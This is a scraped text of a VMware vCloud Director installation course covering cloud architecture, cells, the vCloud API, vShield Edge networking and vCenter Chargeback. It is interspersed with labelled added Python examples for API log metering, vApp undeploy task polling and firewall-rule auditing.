VCloud Director-Install-Configure Manage Allchapters


Page 1: VCloud Director-Install-Configure Manage Allchapters

8/10/2019 VCloud Director-Install-Configure Manage Allchapters

http://slidepdf.com/reader/full/vcloud-director-install-configure-manage-allchapters 1/392

VMware vCloud Director: Install, Configure, Manage

MODULE 1: Course Introduction (Slide 1-1)


Slide 1-2: Importance

This course trains you in using VMware® vCloud Director® to deliver infrastructure as a service in a private enterprise cloud. The course includes information about public clouds.

You perform hands-on labs to understand how IT resources are delivered and consumed in a cloud environment.

Your instructor demonstrates the basics of how vCloud Director abstracts, allocates, and meters IT resources in a cloud environment.


Slide 1-4: You Are Here

Course Introduction
VMware vCloud Director Architecture and Components
VMware vCloud Director Networking
VMware vCloud Director Providers
VMware vCloud Director Organizations
VMware vCloud Director Basic Security
Managing VMware vCloud Director Resources
Managing VMware vSphere Resources
Monitoring VMware vCloud Director Components
VMware vCloud Director Organization Users
VMware vCloud Director Installation


Slide 1-5: Typographical Conventions

The following typographical conventions are used in this course:

Monospace: Filenames, folder names, path names, command names (the bin directory)
Monospace bold: What the user types (Type ipconfig and press Enter.)
Boldface: Graphical user interface items (the Configuration tab)
Italic: Book titles and emphasis (vSphere Upgrade Guide)
<filename>: Placeholders (<ESXi_host_name>)


Slide 1-6: Classroom Discussion: Cloud Computing

Define cloud computing: Cloud computing is an approach to computing that leverages the efficient pooling of on-demand, self-managed virtual infrastructure that is consumed as a service.


Slide 1-7: Classroom Discussion: Cloud Computing Types

List the three types of cloud deployment: Private, Public, Hybrid

Briefly state what you understand about each of these cloud deployments:

Private: Operated solely within an enterprise for consumption by one or many internal organizations, typically behind the firewall
Hybrid: Composition of two or more interoperable clouds, enabling data and application portability
Public: Accessible over the Internet for general consumption


Slide 1-8: Classroom Discussion: Components

Which product provides the networking services in vCloud Director? VMware vCloud® Networking and Security servers provide the networking services to vCloud Director.

To which VMware products does each vCloud Director server group require access? Each vCloud Director server group requires access to a VMware® vCenter Server system, a vCloud Networking and Security server, and one or more VMware® ESX®/VMware® ESXi hosts.


Slide 1-9: Classroom Discussion: Using vCloud Director

What is an organization composed of? Organizations are composed of users and groups, vApps, catalogs, and organization VDCs.

What is the role of the organization administrator after the system administrator sets up the organization? The organization administrator logs in to the organization and sets it up, configures resource use, adds users, and selects organization-specific profiles and settings.


Slide 1-10: VMware Online Resources

VMware Communities: http://communities.vmware.com
Start a discussion, and access communities and user groups.

VMware Support: http://www.vmware.com/support
Access the knowledge base, documentation, technical papers, and compatibility guides.

VMware Education: http://www.vmware.com/education
Access the course catalog and worldwide course schedule. Access information about advanced courses to continue on your virtualization training path.

For easy access to online resources, install the VMware® toolbar.


Slide 1-11: vCloud Resources

www.vmware.com > Products > vCloud Director > Resources


MODULE 2: Architecture and Components (Slide 2-1)


Slide 2-2: You Are Here

Course Introduction
VMware vCloud Director Architecture and Components
VMware vCloud Director Networking
VMware vCloud Director Providers
VMware vCloud Director Organizations
VMware vCloud Director Basic Security
Managing VMware vCloud Director Resources
Managing VMware vSphere Resources
Monitoring VMware vCloud Director Components
VMware vCloud Director Organization Users
VMware vCloud Director Installation


Slide 2-5: vCloud Architecture (1)

VMware vCloud® is a VMware® cloud solution built on VMware technologies and solutions to deliver cloud computing. Cloud computing is a new approach to computing that leverages the efficient pooling of on-demand, self-managed virtual infrastructure to provide resources consumable as a service.

A simple cloud architecture might contain a VMware® vCloud Director® server group comprising multiple servers. Each server can run a collection of services called a vCloud Director cell.

Each vCloud Director server group requires at least one VMware® vCenter Server™ system, a VMware vCloud® Networking and Security™ server, and one or more VMware® ESX® or VMware® ESXi™ hosts. For each vCenter Server system managed by vCloud Director, there must be one vCloud Networking and Security server.

All vCloud Director servers in the group share a single vCloud Director database. The group connects to one or more vCenter Server systems and the ESX or ESXi hosts that they manage. One vCloud Networking and Security server is needed for each vCenter Server system. vCloud Networking and Security servers provide network security services and automatically deploy VMware® vShield Edge™ virtual appliances on demand from vCloud Director.


Slide 2-6: vCloud Architecture (2)

The VMware vCloud Director Web console allows administrators and operators management control of vCloud Director. The Web console and communications from the vCloud API system should connect first to a load balancer. The load balancer routes the communication to one of several vCloud Director cells.

All vCloud Director cells in the cloud share a common vCloud Director database. The vCloud Director cells should also connect to a common NFS server. The NFS server is used as a temporary storage facility for images and files that are uploaded into the vCloud Director catalog.

[Diagram, Slide 2-6: vCloud architecture. VMware vSphere®: vCenter Server, vCenter database, ESX/ESXi hosts each running a vCloud Agent, datastores. LDAP and VMware vSphere® Web Client. vCenter Chargeback: web interface, server, database, data collectors. vCloud Director: vCloud Director cells behind a load balancer, vCloud Director database, vCloud Director Web console, VMware vCloud® API, serving end users and administrators. vCNS (vCloud Networking and Security) and vCNS virtual appliances. NFS server. vCloud Connector virtual appliance with vCC plug-in.]


Slide 2-7: vCloud Architecture (3)

The vCloud architecture graphic shows the core and the optional components of vCloud. Other VMware components can be added to increase capabilities or control. One example is VMware® vCenter™ Chargeback™. vCenter Chargeback provides resource metering and reporting to facilitate resource showback/chargeback. vCenter Chargeback is composed of a vCenter Chargeback server and vCenter Chargeback data collector.

VMware vCloud® Connector™ is an optional component that helps facilitate the transfer of a powered-off VMware vSphere® vApp™ in Open Virtualization Format (OVF) format from a local cloud or vSphere instance to a remote cloud or vSphere instance. vCloud Connector is a virtual appliance that installs in vSphere and handles all the logic of working with other clouds. The GUI is displayed in the VMware vSphere® Web Client through the vCloud Connector browser plug-in.

[Diagram, Slide 2-7: the vCloud architecture with core and optional components: VMware® vCenter Server, VMware® ESX®/VMware® ESXi hosts with vCloud Agents, datastores, VMware vCenter database, LDAP, VMware vSphere® Web Client, VMware® vCenter Chargeback (Web interface, server, database, data collectors), vCloud Director (cells behind a load balancer, vCloud Director database, Web console, vCloud API, end users and administrators), vCloud Networking and Security with vShield Edge virtual appliances, NFS server, and the VMware vCloud® Connector (vCC) virtual appliance with its vCC plug-in.]


Slide 2-8: Multiple Cell Architecture

Each vCloud Director cell is automatically assigned a role. When communication requests come into the load balancer, the requests fall into one of four major categories:

• User Interface (UI). This is the main Web console that administrators and operators use to manage vCloud Director.
• API. The API consists of commands that can be issued to vCloud Director from other systems and scripts through the API. Some commands and functions can only be issued through the API.
• Virtual Machine Remote Console (VMRC). This is the pop-out console that an operator can open on any virtual machine running in vCloud Director.
• Image Transfer. This is the system that allows files and images like .ISO files to be uploaded into vCloud Director.

A master cell (selected by vCloud Director) coordinates the role assignment to vCloud Director cells.

Each cell will have a different role automatically assigned. Multiple cells provide load balancing.

[Diagram, Slide 2-8: UI, API, VMRC, and image transfer requests pass through a firewall to a load balancer, which distributes them across cells whose roles are core (UI/API), console proxy, and image transfer.]


Slide 2-9: vCloud Components: vSphere

vCloud infrastructures rely on vSphere resources to provide CPU and memory to run virtual machines. vCloud Director also uses vSphere distributed switches and vSphere port groups to support virtual machine networking. vSphere datastores provide storage for virtual machine files and other files necessary for virtual machine operations. These underlying vSphere resources are used by vCloud Director to create cloud resources.

vCloud Director requires all workloads to be virtualized. Clusters enabled by VMware vSphere® Distributed Resource Scheduler™ (DRS) should be set to automatically balance the vCloud Director deployed workloads across the physical compute resources of the DRS cluster.

NOTE
vCloud Director can be used with a VMware vSphere® Enterprise Edition™ license. To use vSphere distributed switches, you must have a VMware vSphere® Enterprise Plus Edition™ license.

Use vSphere Web Client for vSphere configuration and preparation.

vCenter Server and vCenter objects:
- Data centers, host clusters, resource pools, vSphere distributed switches, storage service levels

ESX/ESXi host configuration:
- Virtual switches and networks
- Datastores

vSphere resources, when attached, are managed by vCloud Director.

[Diagram, Slide 2-9: vSphere components: vCenter Server, ESX/ESXi hosts*, datastores, vSphere*, vCenter Server database, LDAP, vSphere Web Client. *minimum vSphere 4.0 U2 or 4.1]


Slide 2-10: Supported vCenter Server and ESX/ESXi Versions

For information about the supported versions of vCenter Server, ESX/ESXi, and VMware vCloud® Networking and Security, see the VMware Product Interoperability Matrixes at http://partnerweb.vmware.com/comp_guide/sim/interop_matrix.php.

vCenter Server 5.x is required for fast provisioning, hardware version 8, and virtual private network support with vCloud Director 5.5.


Slide 2-11: vCloud Components: vCloud Director

A vCloud Director server group consists of one or more vCloud Director servers. These servers share a common database and are linked to an arbitrary number of vCenter Server systems and ESXi hosts. vCloud Networking and Security servers provide network services to vCenter Server and vCloud Director. A vCloud Director server group includes multiple vCloud Director servers. Each server can run a collection of services called a vCloud Director cell. All servers in the group share a single database. The group connects to multiple vCenter Server systems and the ESXi hosts that they manage. Each vCenter Server system connects to one vCloud Networking and Security server.

A Web-based portal for vCloud administrators provides the means to allocate and separate resources into organizations. Administrators can set lease times to control how long vApps can run and be stored. Administrators can also set quotas, which limit the number of virtual machines that an organization can have.

A Web-based portal for each organization provides consumers with the means to create and manage their own virtual machines. Access is controlled through a roles-based model set up by the organization administrator.

vCloud Director cell:
- Runs on Red Hat Enterprise Linux
- Runs cloud Web server portal for the vCloud Director Web console
  - Split between consumers (organization portals) and administrators (system)
- Access to vSphere infrastructure can be on a private network segment for security reasons.

Requirements:
- Runs on a physical or a virtual machine. A virtual machine is preferred.
- Connects to an LDAP server for user management.
- Connects to an SMTP server for notifications.
- Connects to an NFS server for VMware vSphere® vApp file transfer service (multicell environments).
- Connects to the vCloud Director database.

[Diagram, Slide 2-11: VMware vCloud Director: vCloud Director cells behind a load balancer, sharing the vCloud Director database; the vCD Web console and vCloud API serve end users and administrators; the cells connect to the ESX/ESXi hosts (vCloud Agent), LDAP, SMTP server, and vCenter Server.]


Slide 2-12: vCloud Director Scaling

Scaling vCloud Director to large environments is supported by installing multiple vCloud Director cells. Cell activities are coordinated through a shared database. One cell is designated as the coordinator cell. All other cells are designated as subordinate cells. The coordinator cell designates which services run on the subordinate cells. These designations are all done automatically by vCloud Director.

Multiple cells require load balancing to manage heavy use of Web and remote consoles. Options include configuring round-robin DNS or using a third-party load-balancing product.

A single cell can support many vCenter Server instances. These instances should all be in the same site to avoid potential latency. You must also scale your vSphere deployment to provide the resources necessary for the multiple vCloud Director cells.

vCloud Director cells are stateless front-end processors for vCloud. All cells connect to a central database. Each cell has a variety of purposes and self-manages various functions among cells. The cell manages connectivity to the cloud and provides both API and UI endpoints for clients.

vCloud Director multicell environment:
- HTTPS load balancer in front of cells
- All cells share vCloud Director database.
- vCloud Director cells scale horizontally.
- NFS server for vSphere vApp file transfer service

Recommendation:
- All cells are on a single site.
- All infrastructure local to site.

[Diagram, Slide 2-12: vCloud Director cells behind a load balancer; the vCloud Director Web console points to a single URL; the cells share the vCloud Director database and an NFS server.]


Multiple cells (a load-balanced group) should be used to address availability and scale. This addressing is typically achieved by load balancing or content switching the front-end layer. Load balancers present a consistent address for services, regardless of the underlying node responding. Load balancers can spread session load across cells, monitor cell health, and add or remove cells from the active service pool.

If your vCloud Director installation includes multiple cloud cells running behind a load balancer or a network address translation (NAT) device, or if the cloud cells do not have publicly routable IP addresses, you can set a public console proxy address. During the initial configuration of each cloud cell, a remote console proxy IP address is specified. By default, vCloud Director uses that address when a user attempts to view a virtual machine console. To use a different address, specify a public console proxy address.

In general, any load balancer that supports SSL session persistence and has network connectivity to the public-facing Internet or internal service network can perform load balancing of vCloud Director cells. General concerns around performance, security, manageability, and so on should be taken into account when deciding to share or dedicate load balancing resources.


Slide 2-13: vCloud Director Components: vCloud Director Web Console

The Remote Framebuffer (RFB) protocol is used by the vCloud Director Web console. VMware encrypts RFB for security. Virtual Network Computing (VNC) is a common implementation of RFB, but VMware does not use VNC code.

Web browser-based interface for consumers and administrators:
- Windows Internet Explorer, Mozilla Firefox, or Google Chrome
- Supporting Adobe Flash Player 10.2 or later, 32-bit version
- RFB-based consoles for virtual machine guest operating system console


Slide 2-14: vCloud Components: vCloud API

The vCloud API is an interface for providing and consuming virtual resources in the cloud. It enables deploying and managing virtualized workloads in private, public, and hybrid clouds. The vCloud API enables the upload and download of vApps and their instantiation, deployment, and operation. In 2009, VMware submitted the vCloud API to the Distributed Management Task Force to promote consistent mobility, provisioning, management, and service assurance of applications running in internal and external clouds.

The vCloud API uses a Representational State Transfer (REST) application development style. vCloud API clients and servers communicate over HTTP, exchanging representations of vCloud objects. These representations take the form of XML elements. HTTP GET requests are used to retrieve the current representation of an object. HTTP POST and PUT requests are used to create or modify an object. HTTP DELETE requests are typically used to delete an object.

Open standard for cloud interaction:
- Submitted to DMTF
- RESTful API
- Implemented in vCloud Director

[Diagram, Slide 2-14: the vCloud API is a pure-virtual API for interacting at the cloud layer; the VIM API controls vSphere resources at the virtualization layer, based on physical resources at the physical layer. Client operations: GET retrieves the representation of a resource without side effects; PUT updates the representation of a resource; POST creates a new resource or executes an action on a resource; DELETE destroys a resource.]


Slide 2-15: vCloud Director Components: vCloud API

The vCloud API allows for interacting with a cloud and can be used to facilitate communication with vCloud Director using a UI other than the portal that is included with vCloud Director. The vCloud API is the cornerstone of federation and ecosystem support in a vCloud environment. All the current federation tools communicate with the vCloud environment through the vCloud API. The ISV ecosystem also uses the vCloud API to enable its software to communicate with vCloud environments. Having a vCloud environment expose the vCloud API to the cloud consumer is important.

Currently, vCloud Director is the only software package that exposes the vCloud API. In some environments, vCloud Director is deployed behind a portal or in another location not readily accessible to the cloud consumer. In this case, an API proxy or relay must be present to have the vCloud API exposed to the end consumer.

Because of the value of the vCloud API, some environments might want to meter API usage and charge extra for it to customers. Protecting the vCloud API through audit trails as well as API inspection is a good idea. Cloud providers can extend the vCloud API with new features.
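The metering and audit-trail point above is easiest to see on a log. The following Python is an added example, not course material or VMware code: it reads a constructed per-request log (the `org=... user=... method=... path=... status=...` line format is assumed for the example; a real API proxy or relay would log in its own format), meters successful calls per organization for chargeback, builds an audit trail of every state-changing request with the `/action/<name>` verb pulled out, and flags a user issuing an unusual number of DELETE requests.

```python
"""Metering and audit over a vCloud API access log (added example; the log
format and sample lines are constructed, not a VMware format)."""
import re
from collections import Counter

# Constructed sample of what an API proxy in front of vCloud Director might record.
SAMPLE_LOG = """\
2013-10-01T08:00:01Z org=acme user=alice method=GET path=/api/vApp/vapp-7 status=200
2013-10-01T08:00:05Z org=acme user=alice method=POST path=/api/vApp/vapp-7/action/undeploy status=202
2013-10-01T08:00:09Z org=acme user=alice method=GET path=/api/task/201 status=200
2013-10-01T08:01:00Z org=beta user=bob method=DELETE path=/api/vApp/vapp-12 status=202
2013-10-01T08:01:02Z org=beta user=bob method=DELETE path=/api/vApp/vapp-13 status=202
2013-10-01T08:01:03Z org=beta user=bob method=DELETE path=/api/vApp/vapp-14 status=401
2013-10-01T08:02:00Z org=acme user=carol method=PUT path=/api/vApp/vapp-7 status=200
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) org=(?P<org>\S+) user=(?P<user>\S+) "
    r"method=(?P<method>[A-Z]+) path=(?P<path>\S+) status=(?P<status>\d{3})$"
)
ACTION_RE = re.compile(r"/action/(?P<action>[^/]+)$")


def parse_log(text):
    """Parse the constructed log into dicts; reject lines that do not match,
    because an audit trail with silently dropped lines is worse than none."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError("unparseable log line: " + line)
        rec = m.groupdict()
        rec["status"] = int(rec["status"])
        records.append(rec)
    return records


def meter_by_org(records):
    """Metering: count API calls that succeeded (2xx) per organization."""
    counts = Counter(r["org"] for r in records if 200 <= r["status"] < 300)
    return dict(counts)


def audit_state_changes(records):
    """Audit trail: every non-GET request, with the /action/<name> verb extracted
    so an undeploy reads as 'undeploy' rather than an anonymous POST."""
    trail = []
    for r in records:
        if r["method"] == "GET":
            continue
        m = ACTION_RE.search(r["path"])
        action = m.group("action") if m else r["method"].lower()
        trail.append((r["ts"], r["org"], r["user"], action, r["path"], r["status"]))
    return trail


def flag_bulk_deletes(records, threshold=2):
    """API inspection: (org, user) pairs issuing more than `threshold` DELETEs,
    counting rejected attempts too, since those are the ones worth a second look."""
    deletes = Counter((r["org"], r["user"]) for r in records if r["method"] == "DELETE")
    return {key: n for key, n in deletes.items() if n > threshold}


if __name__ == "__main__":
    recs = parse_log(SAMPLE_LOG)
    print("calls per org:", meter_by_org(recs))
    for entry in audit_state_changes(recs):
        print("audit:", entry)
    print("bulk deletes:", flag_bulk_deletes(recs))
```

The metering counter only credits 2xx responses, so rejected calls are not billed, while the DELETE counter deliberately includes rejected attempts: a run of 401s against DELETE is exactly the pattern an audit trail exists to surface.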

User API:
- Used to perform tasks in and control what can be done through the vCloud Director consumer portal.
- The vCloud Director implementation of the vCloud API open standard

Administrative API:
- Used to perform tasks in and control what can be done through the vCloud Director administrator portal.
- Specific to vCloud Director

Extensions:
- vSphere platform operations

Example request and response from the slide:

POST http://vcloud.example.com/api/v1.0/vApp/vapp-7/action/undeploy
Content-type: application/vnd.vmware.vcloud.undeployVAppParams+xml
...
<UndeployVAppParams saveState="true" xmlns="http://www.vmware.com/vcloud/v1"/>

202 Accepted
Content-Type: application/vnd.vmware.vcloud.task+xml
...
<Task href="http://vcloud.example.com/task/201"...>
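The exchange above is the general pattern of every action in the vCloud API: an action POST is answered with 202 Accepted and a Task, which the client follows until it finishes. The Python below is an added example, not code from the course or from VMware; it builds the undeploy request as on the slide, parses the Task reply with the standard library, and runs the whole exchange against a constructed in-memory stand-in for a cell so it works offline. The Task status values (`queued`, `preRunning`, `running`, `success`), polling by GET on the Task href, and the 415 response for a wrong media type are assumptions of the example.

```python
"""Undeploy a vApp through the vCloud API and follow the returned Task
(added example; the server here is a constructed stand-in, not vCloud Director)."""
import xml.etree.ElementTree as ET

VCLOUD_NS = "http://www.vmware.com/vcloud/v1"   # namespace used in the slide's request
UNDEPLOY_TYPE = "application/vnd.vmware.vcloud.undeployVAppParams+xml"
TASK_TYPE = "application/vnd.vmware.vcloud.task+xml"
PENDING = ("queued", "preRunning", "running")   # assumed non-final Task states
ET.register_namespace("", VCLOUD_NS)            # serialise with a default xmlns, as on the slide


def build_undeploy_request(vapp_href, save_state=True):
    """The POST from the slide: action URL, media type header, and the
    UndeployVAppParams body. Returns (method, url, headers, body)."""
    params = ET.Element(f"{{{VCLOUD_NS}}}UndeployVAppParams",
                        {"saveState": "true" if save_state else "false"})
    body = ET.tostring(params, encoding="unicode")
    return "POST", vapp_href + "/action/undeploy", {"Content-Type": UNDEPLOY_TYPE}, body


def parse_task(status, headers, body, expected_status):
    """Check the HTTP status and media type before trusting the body, then pull
    the Task's href (where to poll) and status (whether it is done)."""
    if status != expected_status:
        raise RuntimeError(f"expected HTTP {expected_status}, got {status}")
    if headers.get("Content-Type") != TASK_TYPE:
        raise RuntimeError(f"unexpected Content-Type {headers.get('Content-Type')!r}")
    task = ET.fromstring(body)
    if task.tag != f"{{{VCLOUD_NS}}}Task":
        raise RuntimeError(f"expected a Task element, got {task.tag}")
    return {"href": task.get("href"), "status": task.get("status")}


def undeploy_vapp(send, vapp_href, save_state=True, max_polls=10):
    """Full exchange: POST the action (202 Accepted + Task), then GET the Task
    until it leaves the pending states. `send(method, url, headers, body)` is the
    transport, so a real HTTPS client can be substituted for the stand-in below."""
    method, url, headers, body = build_undeploy_request(vapp_href, save_state)
    task = parse_task(*send(method, url, headers, body), expected_status=202)
    for _ in range(max_polls):
        if task["status"] not in PENDING:
            return task
        task = parse_task(*send("GET", task["href"], {"Accept": TASK_TYPE}, None),
                          expected_status=200)
    raise TimeoutError(f"task {task['href']} still {task['status']} after {max_polls} polls")


class FakeCell:
    """Constructed stand-in for a vCloud Director cell: accepts the undeploy action,
    hands back the Task from the slide, and reports it finished after a few polls."""

    def __init__(self, polls_until_done=2):
        self.polls_until_done = polls_until_done
        self.polls = {}
        self.requests = []

    @staticmethod
    def _task(href, state):
        return ET.tostring(ET.Element(f"{{{VCLOUD_NS}}}Task",
                                      {"href": href, "status": state}), encoding="unicode")

    def handle(self, method, url, headers=None, body=None):
        self.requests.append((method, url))
        if method == "POST" and url.endswith("/action/undeploy"):
            if (headers or {}).get("Content-Type") != UNDEPLOY_TYPE:
                return 415, {}, ""                        # assumed: Unsupported Media Type
            href = "http://vcloud.example.com/task/201"   # task href from the slide
            self.polls[href] = 0
            return 202, {"Content-Type": TASK_TYPE}, self._task(href, "queued")
        if method == "GET" and url in self.polls:
            self.polls[url] += 1
            state = "success" if self.polls[url] >= self.polls_until_done else "running"
            return 200, {"Content-Type": TASK_TYPE}, self._task(url, state)
        return 404, {}, ""


if __name__ == "__main__":
    cell = FakeCell()
    done = undeploy_vapp(cell.handle, "http://vcloud.example.com/api/v1.0/vApp/vapp-7")
    print(done, cell.requests)
```

The client checks the status code, the media type and the element name before reading any attribute, which is the habit that keeps an API proxy or relay (the deployment described above) from being trusted blindly; the `send` callable is the only thing to replace to drive a real cell over HTTPS.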



The vCloud API, included with vCloud Director, consists of a user API, an administrative API, and extensions:

• The user API is the vCloud Director implementation of the vCloud API open standard. An administrator can use this API to perform and control activities done through the vCloud Director organization Web consoles.
• The administrative API is specific to vCloud Director. An administrator can use this API to perform and control activities done through the vCloud Director administrator portal.
• Extensions enable administrators to perform VMware vSphere® platform operations.



Slide 2-16: vCloud Components: vCloud Networking and Security

vCloud Director uses vShield Edge appliances to secure multitenancy. vShield Edge also provides NAT, DHCP, firewall, port forwarding, and IP masquerading services. vCloud Director works with vCloud Networking and Security to deploy a vShield Edge device as part of the network creation process. These appliances run on vSphere hosts.

Each vCenter Server system is connected to a vCloud Networking and Security host. vCloud Networking and Security is a Linux-based virtual appliance that deploys and manages vShield Edge devices as requested by vCloud Director. vCloud Networking and Security also aggregates usage data for vCenter Chargeback.

vShield Edge appliances are deployed automatically by vCloud Director through vCloud Networking and Security as needed. vShield Edge appliances reside in the vCloud consumer resource clusters, not in the management cluster. vShield Edge appliances are placed in a system resource pool by vCloud Director and vCenter Server. For more information about the vShield Edge appliance and its functions, see vCloud Suite Documentation at https://www.vmware.com/support/pubs/.

vCloud Networking and Security:
- Responsible for deploying and managing VMware® vShield Edge devices as requested by vCloud Director: Edge gateway and vApp network devices
- Connects to the vCenter Server system through the VMware vSphere® API for vShield Edge deployment
- Manages configurations through VMware VIX API
- Virtual appliance
- Runs management interface
- Aggregates usage data for chargeback
- One vCloud Networking and Security server per attached vCenter Server system

vShield Edge:
- Firewall and router device that provides network and security services
- Deployed automatically by vCloud Director through vCloud Networking and Security
- Deployed to vSphere hosts as a virtual appliance

vCNSsystem

vShieldEdge

vShieldEdge

vCloud Networking and Securitymanager UI

vShieldEdge
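Because each vShield Edge firewall is the boundary between a tenant and everything outside it, the check a practitioner wants is an audit of the edge configuration as vCloud Director exposes it. The following is an added example written for this page; it is not code from the course or from VMware. The XML layout follows the vCloud API 5.1 EdgeGatewayServiceConfiguration and FirewallService element names as the editor recalls them, so treat those names and the namespace as assumptions to check against the API reference for your version. The sample document is constructed and deliberately contains a permissive default action and an any/any rule.

```python
"""Audit a vShield Edge firewall configuration retrieved through the vCloud API.

Added example (not from the course). Element names and namespace follow the
vCloud API 5.1 EdgeGatewayServiceConfiguration schema as recalled; they are an
assumption to verify against the API reference. The sample XML is constructed.
"""
import xml.etree.ElementTree as ET

NS = {"vc": "http://www.vmware.com/vcloud/v1.5"}  # assumed vCloud API namespace

# Constructed sample: default action "allow", one scoped rule, one any/any
# rule, and one disabled rule that must not be reported.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<EdgeGatewayServiceConfiguration xmlns="http://www.vmware.com/vcloud/v1.5">
  <FirewallService>
    <IsEnabled>true</IsEnabled>
    <DefaultAction>allow</DefaultAction>
    <LogDefaultAction>false</LogDefaultAction>
    <FirewallRule>
      <IsEnabled>true</IsEnabled><Id>1</Id><Policy>allow</Policy>
      <Description>web in</Description>
      <Protocols><Tcp>true</Tcp></Protocols>
      <DestinationPortRange>443</DestinationPortRange>
      <DestinationIp>10.10.0.10</DestinationIp>
      <SourcePortRange>Any</SourcePortRange><SourceIp>Any</SourceIp>
      <EnableLogging>false</EnableLogging>
    </FirewallRule>
    <FirewallRule>
      <IsEnabled>true</IsEnabled><Id>2</Id><Policy>allow</Policy>
      <Description>temporary debug</Description>
      <Protocols><Any>true</Any></Protocols>
      <DestinationPortRange>Any</DestinationPortRange>
      <DestinationIp>Any</DestinationIp>
      <SourcePortRange>Any</SourcePortRange><SourceIp>Any</SourceIp>
      <EnableLogging>false</EnableLogging>
    </FirewallRule>
    <FirewallRule>
      <IsEnabled>false</IsEnabled><Id>3</Id><Policy>drop</Policy>
      <Description>disabled rule</Description>
      <Protocols><Any>true</Any></Protocols>
      <DestinationPortRange>Any</DestinationPortRange>
      <DestinationIp>Any</DestinationIp>
      <SourcePortRange>Any</SourcePortRange><SourceIp>Any</SourceIp>
      <EnableLogging>false</EnableLogging>
    </FirewallRule>
  </FirewallService>
</EdgeGatewayServiceConfiguration>
"""


def _text(elem, tag, default=""):
    """Text of a direct child element in the vCloud namespace, or default."""
    child = elem.find(f"vc:{tag}", NS)
    return (child.text or "").strip() if child is not None else default


def audit_firewall(xml_text):
    """Return a list of (severity, message) findings for one edge gateway."""
    root = ET.fromstring(xml_text)
    fw = root.find("vc:FirewallService", NS)
    findings = []
    if fw is None or _text(fw, "IsEnabled").lower() != "true":
        findings.append(("high", "firewall service is disabled"))
        return findings
    if _text(fw, "DefaultAction").lower() != "drop":
        findings.append(("high", "default action is not drop"))
    if _text(fw, "LogDefaultAction").lower() != "true":
        findings.append(("low", "default action is not logged"))
    for rule in fw.findall("vc:FirewallRule", NS):
        if _text(rule, "IsEnabled").lower() != "true":
            continue  # a disabled rule filters nothing, so it is not a finding
        if _text(rule, "Policy").lower() != "allow":
            continue  # only allow rules widen the boundary
        rid = _text(rule, "Id", "?")
        protocols = rule.find("vc:Protocols", NS)
        any_proto = protocols is not None and protocols.find("vc:Any", NS) is not None
        src_any = _text(rule, "SourceIp").lower() == "any"
        dst_any = _text(rule, "DestinationIp").lower() == "any"
        port_any = _text(rule, "DestinationPortRange").lower() == "any"
        if src_any and dst_any and port_any and any_proto:
            findings.append(("high", f"rule {rid} allows any source to any destination on any port"))
        elif src_any and port_any:
            findings.append(("medium", f"rule {rid} allows any source on any port"))
        if _text(rule, "EnableLogging").lower() != "true":
            findings.append(("low", f"rule {rid} is an allow rule without logging"))
    return findings


if __name__ == "__main__":
    for severity, message in audit_firewall(SAMPLE_XML):
        print(f"{severity:6} {message}")
```

Run against a configuration fetched from the edge gateway's service configuration link, the audit flags the allow-by-default policy and rule 2 as high, and skips the disabled rule 3. Rule 1 is reported only for missing logging, since its destination and port are scoped.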


vCloud Components: vCenter Chargeback
Slide 2-17

vCenter Chargeback helps to accurately assign, measure, and analyze the cost of workloads in a vCloud environment. The diagram illustrates how the architectural components of vCenter Chargeback integrate with other vCloud components.

vCenter Chargeback includes four main components:

• vCenter Chargeback runs on an Apache Tomcat server instance. The user interacts with the vCenter Chargeback application through a load balancer (Apache HTTP server). vCenter Chargeback connects to a vCenter Chargeback database that stores application-specific information.

• vCenter Chargeback retrieves the virtual infrastructure inventory and the resource and network usage information through data collectors. An embedded data collector communicates with the vCenter Server database. vCloud infrastructures also use the optional vCloud Director and vCloud Networking and Security data collectors. vCenter Chargeback replicates collected data in the vCenter Chargeback database. vCenter Chargeback uses this information, the cost model, and the chargeback cost calculation formulas to generate cost reports.

vCenter Chargeback server:
• Runs the Web portal (Apache Tomcat server) for users and the administrative interface
• Abstracts vCenter Server and vCloud Director objects into the vCenter Chargeback hierarchy
• Allows resource cost assignment aligned to vCloud Director resource allocation models
• Generates cost and usage reports
• Built-in load balancer for scaling vCenter Chargeback servers

vCenter Chargeback database

Data collector:
• Gathers usage data
• Populates the vCenter Chargeback database

Interface access:
• Web interface
• VMware vSphere® Client plug-in

Diagram: the vCenter Chargeback server (Web interface, database, data collectors) connected to vCenter Server and the vCenter database, LDAP, the vSphere Client plug-in, an SMTP server, the vCloud Director cell and vCloud Director database, and vShield Manager.


• When you install vCenter Chargeback, the vCenter Chargeback application, the load balancer, and the data collectors are installed and run on the same machine. Although the vCenter Chargeback database can also be installed on the same machine, in a real-world scenario you install the application and the database on separate machines.

• A single data collector instance replicates the information to the vCenter Chargeback database from multiple vCenter Server instances and vCloud Director databases. You can also create a cluster of vCenter Chargeback instances that share a single load balancer. Each user request is routed through the load balancer. The load balancer forwards the request to a vCenter Chargeback instance in the cluster based on the number of requests currently being serviced by each instance in the cluster. All the vCenter Chargeback instances in a cluster are connected to the same vCenter Chargeback database.

The vCenter Chargeback database stores the following chargeback-specific information:

• vCenter Chargeback hierarchy
• vCenter Chargeback users and roles
• Cost models and usage metrics
• Configuration settings

Three types of vCenter Chargeback data collectors are provided:

• vCenter Chargeback data collector (polls vCenter Server)
• vCloud data collector (polls vCloud Director)
• vCloud Networking and Security data collector (polls vCloud Networking and Security)

These data collectors collect vCenter Server inventory and vCloud Director organizational information, poll usage information, and populate the vCenter Chargeback database through synchronization jobs. The first instance is installed on the vCenter Chargeback server when you install vCenter Chargeback.

The vCenter Chargeback Web interface is a Web browser-based interface for users and administrators. The vCenter Chargeback plug-in for the VMware vSphere® Client™ provides limited vCenter Chargeback administration. Only a subset of the Web interface capabilities is available, and the vCenter Chargeback hierarchy is replicated from the vCenter Server hierarchy.


vCenter Chargeback Scaling
Slide 2-18

vCenter Chargeback virtual machines can be deployed as a two-node, load-balanced cluster. Multiple vCenter Chargeback data collectors can be deployed remotely to avoid a single point of failure.

These deployments have no effect on infrastructure availability or customer virtual machines. Configuring vCenter Chargeback servers in a cluster ensures that providers can continue to produce accurate customer billing information and usage reports if one server fails. Configuring vCenter Chargeback in a cluster is not required for maintaining workload accessibility.

vCenter Chargeback servers:
• Configure additional installations of vCenter Chargeback server to connect with the built-in load balancer that is included in the first instance.
• The load balancer spreads the request load across multiple vCenter Chargeback servers.

Data collectors:
• Multiple instances can be installed and configured separately.
